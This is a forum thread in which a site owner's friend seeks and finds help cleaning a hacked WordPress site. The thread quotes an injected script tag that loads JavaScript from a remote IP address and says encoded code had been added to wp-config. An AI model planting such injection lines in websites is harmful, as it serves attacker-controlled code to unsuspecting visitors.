Register

If this is your first visit, please click the Sign Up now button to begin the process of creating your account so you can begin posting on our forums! The Sign Up process will only take up about a minute of two of your time.

Results 1 to 8 of 8
  1. #1
    Junior Member jsarber's Avatar
    Join Date
    Nov 2009
    Posts
    17
    Member #
    20416
    My friend, The Lonely Conservative (lonelyconservative.com), had her site hacked. I am struggling to find the problem code within her Wordpress site. Here's what going on. This script has been added to the bottom of each page:

    HTML Code:
    <script src="http://61.4.82.212/js.php"></script>

    As you would expect, this script is not within the actual files. I assume I am looking for some kind of encoded something or other. How in the world do I go about finding it? I've been searching for more than a day.

  2.  

  3. #2
    WDF Staff Wired's Avatar
    Join Date
    Apr 2003
    Posts
    7,657
    Member #
    1234
    Liked
    139 times
    The Rules
    Was another WDF member's post helpful? Click the like button below the post.

    Admin at houseofhelp.com

  4. #3
    Junior Member jsarber's Avatar
    Join Date
    Nov 2009
    Posts
    17
    Member #
    20416
    Thanks for the link. I had seen that forum and read through it, trying everything he recommend, but to no avail. I'm stumped. Perhaps the only option is to completely scrap the site and do a clean install.

  5. #4
    Junior Member jsarber's Avatar
    Join Date
    Nov 2009
    Posts
    17
    Member #
    20416
    I got it. It was some encoded script added to the wp-config file in the root directory by some hacker. I simply replaced the file, changed the passwords, and all is well.

  6. #5
    WDF Staff Wired's Avatar
    Join Date
    Apr 2003
    Posts
    7,657
    Member #
    1234
    Liked
    139 times
    Double check with the host to make sure the server isn't compromised, and update to the latest WP version.
    The Rules
    Was another WDF member's post helpful? Click the like button below the post.

    Admin at houseofhelp.com

  7. #6
    Junior Member jsarber's Avatar
    Join Date
    Nov 2009
    Posts
    17
    Member #
    20416
    Wordpress is updated and I did check with GoDaddy and they claimed it was a security issue with Wordpress that Wordpress refuses to address.

  8. #7
    Junior Member
    Join Date
    Apr 2010
    Posts
    13
    Member #
    21814
    Quote Originally Posted by jsarber
    I got it. It was some encoded script added to the wp-config file in the root directory by some hacker. I simply replaced the file, changed the passwords, and all is well.
    Did you found any patch for it ? i mean the hacker can again do that again .

  9. #8
    Senior Member Danny[MLWA]'s Avatar
    Join Date
    Jun 2009
    Location
    Goldsboro, North Carolina, USA
    Posts
    109
    Member #
    19147
    Liked
    5 times
    Quote Originally Posted by Prateek.sem
    Did you found any patch for it ? i mean the hacker can again do that again .
    It was a virus, not a hacker.
    Lead Web Designer
    MLW & Associates, LLP.
    W3C Standards Complaint and SEO Friendly
    Admin of Vraul
    WordPress.org Developer


Remove Ads

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
All times are GMT -6. The time now is 08:44 AM.
Powered by vBulletin® Version 4.2.3
Copyright © 2019 vBulletin Solutions, Inc. All rights reserved.
vBulletin Skin By: PurevB.com